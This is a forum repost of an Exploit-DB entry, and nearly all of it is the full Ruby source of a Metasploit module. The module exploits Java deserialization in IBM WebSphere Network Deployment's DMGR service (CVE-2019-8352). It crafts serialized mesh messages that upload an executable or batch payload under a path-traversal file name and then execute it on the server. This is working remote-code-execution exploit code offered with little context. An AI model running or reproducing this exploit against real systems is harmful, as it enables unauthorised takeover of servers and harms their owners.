Exploit IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
46969
Проверка EDB
  1. Пройдено
Автор
METASPLOIT
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2019-8352 cve-2019-4279
Дата публикации
2019-06-05
IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)
Код:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution',
      'Description' => %(
        This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells.
        NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset.
      ),
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'b0yd' # @rwincey of [Securifera](https://www.securifera.com/) / Vulnerability Discovery and MSF module author
        ],
      'References' =>
        [
          ['CVE', '2019-8352'],
          ['URL', 'https://www-01.ibm.com/support/docview.wss?uid=ibm10883628']
        ],
      'Platform' => ['win'],
      'Targets' =>
        [
          [
            'Windows Binary', {
              'Arch'     => [ARCH_X86, ARCH_X64],
              'Platform' => 'win'
            }
          ],
          [
            'CMD', {
              'Arch' => ARCH_CMD,
              'Platform' => 'win',
              'Payload' => {'Compat' => {'RequiredCmd' => 'generic'}}
            }
          ]
        ],
      'Privileged' => true,
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 15 2019'))

    register_options(
      [
        Opt::RPORT(11006), # 11002,11004,11006,etc
        OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
        OptRaw.new('SSLVersion', [true, 'Default Version for WASND ', 'SSLv3']),
        OptRaw.new('SSLVerifyMode', [true, 'SSL verification method', 'CLIENT_ONCE']),
        OptString.new('SSLCipher', [true, 'SSL Cipher string ', 'ALL'])
      ]
    )
  end

  def cleanup
    disconnect
    print_status('Disconnected from IBM Websphere DMGR.')
    super
  end

  def exploit
    command = nil

    if target.name == 'CMD'
      fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") unless datastore['CMD']
      command = datastore['CMD']
    end
    # Connect to IBM Websphere Application Server
    connect
    print_status("Connected to IBM WAS DMGR.")

    node_port = datastore['RPORT']

    # Send packet to add neighbor
    enc_stream = construct_tcp_node_msg(node_port)
    send_msg(enc_stream)

    sock.get_once
    print_status('Server responded')

    # Generate binary name
    bin_name = rand_text_alpha(8)

    if command
      command = datastore['CMD']
      payload_contents = command.to_s
      print_status('Executing command: ' + payload_contents)
      bin_name << ".bat"
    else
      payload_contents = generate_payload_exe(code: payload.generate)
      bin_name << ".exe"
    end

    print_status("Sending payload: #{bin_name}")
    enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name)
    send_msg(enc_stream)
    register_file_for_cleanup(bin_name)
  end

  def send_msg(enc_stream)
    pkt = [0x396fb74a].pack('N')
    pkt += [enc_stream.length + 1].pack('N')
    pkt += "\x00"
    pkt += enc_stream

    # Send msg
    sock.put(pkt)
  end

  def construct_tcp_node_msg(node_port)
    p2p_obj = Rex::Java::Serialization::Model::NewObject.new
    p2p_obj.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
    p2p_obj.class_desc.description = build_p2p_node_class(p2p_obj)

    # Create the obj
    object = Rex::Java::Serialization::Model::NewObject.new
    object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
    object.class_desc.description = build_tcp_node_msg(object, 12, "0.0.0.0", node_port, p2p_obj)

    # Create the stream and add the object
    stream = Rex::Java::Serialization::Model::Stream.new
    stream.contents = []
    stream.contents << object
    stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
    stream.contents << Rex::Java::Serialization::Model::NullReference.new
    stream.encode
  end

  def construct_bcast_task_msg(node_port, filename, byte_str, cmd)
    # Add upload file argument
    byte_arr = byte_str.unpack("C*")
    upfile_arg_obj = build_upfile_arg_class(filename, byte_arr, cmd)

    # Create the obj
    object = Rex::Java::Serialization::Model::NewObject.new
    object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
    object.class_desc.description = build_bcast_run_task_msg(object, 41, "0.0.0.0", node_port, upfile_arg_obj)

    # Create the stream and add the object
    stream = Rex::Java::Serialization::Model::Stream.new
    stream.contents = []
    stream.contents << object
    stream.encode
  end

  def build_message(obj, msg_id, msg_type, orig_cell_field_type)
    # Create the integer field and add the reference
    id_field = Rex::Java::Serialization::Model::Field.new
    id_field.type = 'int'
    id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ID')

    # Create the integer field and add the reference
    type_field = Rex::Java::Serialization::Model::Field.new
    type_field.type = 'int'
    type_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'type')

    # Create the object field and add the reference
    new_field = Rex::Java::Serialization::Model::Field.new
    new_field.type = 'object'
    new_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'originatingCell')
    new_field.field_type = orig_cell_field_type

    # Create the class description
    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.Message')
    msg_class_desc.serial_version = 1
    msg_class_desc.flags = 2
    msg_class_desc.fields = []
    msg_class_desc.fields << id_field
    msg_class_desc.fields << type_field
    msg_class_desc.fields << new_field

    # Add annotations
    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]

    # Add superclass
    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
    msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new

    # Set the member values
    obj.class_data << ['int', msg_id]
    obj.class_data << ['int', msg_type]
    obj.class_data << Rex::Java::Serialization::Model::NullReference.new

    msg_class_desc
  end

  def build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
    prng = Random.new
    msg_id = prng.rand(4294967295)

    # Create the field ref
    field_ref = Rex::Java::Serialization::Model::Reference.new
    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1

    msg_obj = build_message(obj, msg_id, msg_type, field_ref)

    # Create the integer field and add the reference
    id_field = Rex::Java::Serialization::Model::Field.new
    id_field.type = 'int'
    id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceMsgID')

    # Create the integer field and add the reference
    port_field = Rex::Java::Serialization::Model::Field.new
    port_field.type = 'int'
    port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceUdpPort')

    # Create the object field and add the reference
    ip_arr_field = Rex::Java::Serialization::Model::Field.new
    ip_arr_field.type = 'array'
    ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceIP')
    ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')

    # Create the class description
    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.BcastFloodMsg')
    msg_class_desc.serial_version = 1
    msg_class_desc.flags = 2
    msg_class_desc.fields = []
    msg_class_desc.fields << id_field
    msg_class_desc.fields << port_field
    msg_class_desc.fields << ip_arr_field

    # Add annotations
    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]

    # Add superclass
    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
    msg_class_desc.super_class.description = msg_obj

    # Construct IP Array
    ip_arr = source_ip.split(".").map(&:to_i)
    builder = Rex::Java::Serialization::Builder.new
    values_array = builder.new_array(
      values_type: 'byte',
      values: ip_arr,
      name: '[B',
      serial: 0x42acf317f8060854e0,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )

    # Set the member values
    obj.class_data << ['int', msg_id]
    obj.class_data << ['int', source_port]
    obj.class_data << values_array

    msg_class_desc
  end

  def build_tcp_node_msg(obj, msg_type, source_ip, source_port, p2p_obj)
    prng = Random.new
    msg_id = prng.rand(4294967295)

    # Create the field type for the origCell
    field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
    msg_obj = build_message(obj, msg_id, msg_type, field_type)

    # Create the port field and add the reference
    boot_time_field = Rex::Java::Serialization::Model::Field.new
    boot_time_field.type = 'long'
    boot_time_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bootTime')

    # Create the port field and add the reference
    tcp_port_field = Rex::Java::Serialization::Model::Field.new
    tcp_port_field.type = 'int'
    tcp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'tcpPort')

    # Create the port field and add the reference
    udp_port_field = Rex::Java::Serialization::Model::Field.new
    udp_port_field.type = 'int'
    udp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'udpPort')

    # Create the object field and add the reference
    ip_arr_field = Rex::Java::Serialization::Model::Field.new
    ip_arr_field.type = 'array'
    ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ip')
    ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')

    # Create the task object field and add field_type
    node_prop_field = Rex::Java::Serialization::Model::Field.new
    node_prop_field.type = 'object'
    node_prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'nodeProperty')
    node_prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Lcom/ibm/son/mesh/AppLevelNodeProperty;")

    # Create the class description
    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.TcpNodeMessage')
    msg_class_desc.serial_version = 1
    msg_class_desc.flags = 2
    msg_class_desc.fields = []
    msg_class_desc.fields << boot_time_field
    msg_class_desc.fields << tcp_port_field
    msg_class_desc.fields << udp_port_field
    msg_class_desc.fields << ip_arr_field
    msg_class_desc.fields << node_prop_field

    # Add annotations
    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]

    # Add superclass
    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
    msg_class_desc.super_class.description = msg_obj

    # Construct IP Array
    ip_arr = source_ip.split(".").map(&:to_i)
    builder = Rex::Java::Serialization::Builder.new
    values_array = builder.new_array(
      values_type: 'byte',
      values: ip_arr,
      name: '[B',
      serial: 0x42acf317f8060854e0,
      annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
    )

    # Set the member values
    obj.class_data << ['long', 0]
    obj.class_data << ['int', source_port]
    obj.class_data << ['int', source_port]
    obj.class_data << values_array
    obj.class_data << p2p_obj

    msg_class_desc
  end

  def build_app_node_class(obj)
    # Create the structured gateway field and add the reference
    struct_bool_field = Rex::Java::Serialization::Model::Field.new
    struct_bool_field.type = 'boolean'
    struct_bool_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'structuredGateway')

    # Create the version field and add the reference
    version_field = Rex::Java::Serialization::Model::Field.new
    version_field.type = 'int'
    version_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'version')

    # Create the object field and add the reference
    bridge_field = Rex::Java::Serialization::Model::Field.new
    bridge_field.type = 'object'
    bridge_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bridgedCellsList')
    bridge_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/List;')

    # Create the field ref
    field_ref = Rex::Java::Serialization::Model::Reference.new
    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4

    # Create the cellname field and add the reference
    cellname_field = Rex::Java::Serialization::Model::Field.new
    cellname_field.type = 'object'
    cellname_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'cellName')
    cellname_field.field_type = field_ref

    # Create the class description
    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.AppLevelNodeProperty')
    msg_class_desc.serial_version = 1
    msg_class_desc.flags = 2
    msg_class_desc.fields = []
    msg_class_desc.fields << struct_bool_field
    msg_class_desc.fields << version_field
    msg_class_desc.fields << bridge_field
    msg_class_desc.fields << cellname_field

    # Add annotations
    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]

    # Add superclass
    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
    msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new

    # Set the member values
    obj.class_data << ['boolean', 0]
    obj.class_data << ['int', 0]
    obj.class_data << Rex::Java::Serialization::Model::NullReference.new
    obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name

    msg_class_desc
  end

  def build_hashtable_class(obj)
    # Create the integer field and add the reference
    load_field = Rex::Java::Serialization::Model::Field.new
    load_field.type = 'float'
    load_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'loadFactor')

    # Create the integer field and add the reference
    threshold_field = Rex::Java::Serialization::Model::Field.new
    threshold_field.type = 'int'
    threshold_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'threshold')

    # Create the class description
    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Hashtable')
    msg_class_desc.serial_version = 0x13BB0F25214AE4B8
    msg_class_desc.flags = 3
    msg_class_desc.fields = []
    msg_class_desc.fields << load_field
    msg_class_desc.fields << threshold_field

    # Add annotations
    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]

    # Add superclass
    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
    msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new

    obj.class_data << ['float', 0.75]
    obj.class_data << ['int', 8]
    obj.class_data << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x0b\x00\x00\x00\x03")

    msg_class_desc
  end

  def build_properties_class
    # Create the object
    object = Rex::Java::Serialization::Model::NewObject.new
    object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new

    msg_obj = build_hashtable_class(object)

    # Create the field ref
    field_ref = Rex::Java::Serialization::Model::Reference.new
    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 9

    # Create the integer field and add the reference
    defaults_field = Rex::Java::Serialization::Model::Field.new
    defaults_field.type = 'object'
    defaults_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'defaults')
    defaults_field.field_type = field_ref

    # Create the class description
    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Properties')
    msg_class_desc.serial_version = 0x3912D07A70363E98
    msg_class_desc.flags = 2
    msg_class_desc.fields = []
    msg_class_desc.fields << defaults_field

    # Add annotations
    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]

    # Add superclass
    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
    msg_class_desc.super_class.description = msg_obj

    # Set the member values
    object.class_desc.description = msg_class_desc

    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'memberName')
    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'inOdc')
    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, '0')
    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'epoch')
    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, (Time.now.to_f * 1000).to_i.to_s)

    object
  end

  def build_p2p_node_class(obj)
    msg_obj = build_app_node_class(obj)

    # Create the field ref
    field_ref = Rex::Java::Serialization::Model::Reference.new
    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1

    # Create the data field and add the reference
    data_field = Rex::Java::Serialization::Model::Field.new
    data_field.type = 'array'
    data_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'data')
    data_field.field_type = field_ref

    # Create the object field and add the reference
    prop_field = Rex::Java::Serialization::Model::Field.new
    prop_field.type = 'object'
    prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'properties')
    prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/Properties;')

    # Create the class description
    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty')
    msg_class_desc.serial_version = 2
    msg_class_desc.flags = 2
    msg_class_desc.fields = []
    msg_class_desc.fields << data_field
    msg_class_desc.fields << prop_field

    # Add annotations
    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]

    # Add superclass
    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
    msg_class_desc.super_class.description = msg_obj

    # Create the byte array ref
    field_ref = Rex::Java::Serialization::Model::Reference.new
    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 6

    # Construct IP Array
    byte_array = Rex::Java::Serialization::Model::NewArray.new
    byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
    byte_array.array_description.description = field_ref
    byte_array.type = "byte"
    byte_array.values = []

    # Set the member values
    obj.class_data << byte_array

    # Add properties
    obj.class_data << build_properties_class

    msg_class_desc
  end

  def build_upfile_arg_class(filename, bytes, cmd)
    # Create the field ref
    field_ref = Rex::Java::Serialization::Model::Reference.new
    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1

    # Create the integer field and add the reference
    filename_field = Rex::Java::Serialization::Model::Field.new
    filename_field.type = 'object'
    filename_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileName')
    filename_field.field_type = field_ref

    # Create the field ref
    field_ref = Rex::Java::Serialization::Model::Reference.new
    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4

    # Create the integer field and add the reference
    filebody_field = Rex::Java::Serialization::Model::Field.new
    filebody_field.type = 'array'
    filebody_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileBody')
    filebody_field.field_type = field_ref

    # Create the field ref
    field_ref = Rex::Java::Serialization::Model::Reference.new
    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1

    # Create the object field and add the reference
    post_cmd_field = Rex::Java::Serialization::Model::Field.new
    post_cmd_field.type = 'object'
    post_cmd_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'postProcCmd')
    post_cmd_field.field_type = field_ref

    # Create the class description
    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileArgument')
    msg_class_desc.serial_version = 1
    msg_class_desc.flags = 2
    msg_class_desc.fields = []
    msg_class_desc.fields << filebody_field
    msg_class_desc.fields << filename_field
    msg_class_desc.fields << post_cmd_field

    # Add annotations
    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]

    # Add superclass
    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
    msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new

    # Create the byte array ref
    field_ref = Rex::Java::Serialization::Model::Reference.new
    field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 7

    # Construct IP Array
    byte_array = Rex::Java::Serialization::Model::NewArray.new
    byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
    byte_array.array_description.description = field_ref
    byte_array.type = "byte"
    byte_array.values = bytes

    # Set the member values
    object = Rex::Java::Serialization::Model::NewObject.new
    object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
    object.class_desc.description = msg_class_desc
    object.class_data << byte_array
    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, filename)
    object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, cmd)

    object
  end

  def build_bcast_run_task_msg(obj, msg_type, source_ip, source_port, upfile_arg_obj)
    msg_obj = build_bcast_flood_msg(obj, msg_type, source_ip, source_port)

    # Create the integer field and add the reference
    out_int_field = Rex::Java::Serialization::Model::Field.new
    out_int_field.type = 'int'
    out_int_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'outputGatherInterval')

    # Create the task object field and add field_type
    task_field = Rex::Java::Serialization::Model::Field.new
    task_field.type = 'object'
    task_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'task')
    task_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")

    # Create the task object field and add field_type
    task_arg_field = Rex::Java::Serialization::Model::Field.new
    task_arg_field.type = 'object'
    task_arg_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'taskArgument')
    task_arg_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/io/Serializable;")

    # Create the integer field and add the reference
    forward_gather_field = Rex::Java::Serialization::Model::Field.new
    forward_gather_field.type = 'int'
    forward_gather_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'forwardGatheredDataPipelinePeriod')

    # Create the class description
    msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
    msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.BcastMsgRunTask')
    msg_class_desc.serial_version = 1
    msg_class_desc.flags = 2
    msg_class_desc.fields = []
    msg_class_desc.fields << forward_gather_field
    msg_class_desc.fields << out_int_field
    msg_class_desc.fields << task_field
    msg_class_desc.fields << task_arg_field

    # Add annotations
    msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
    msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]

    # Add superclass
    msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
    msg_class_desc.super_class.description = msg_obj

    # Set the member values
    obj.class_data << ['int', 0]
    obj.class_data << ['int', 1]
    obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileToAllNodes')
    obj.class_data << upfile_arg_obj

    msg_class_desc
  end
end
 
Источник
www.exploit-db.com

Похожие темы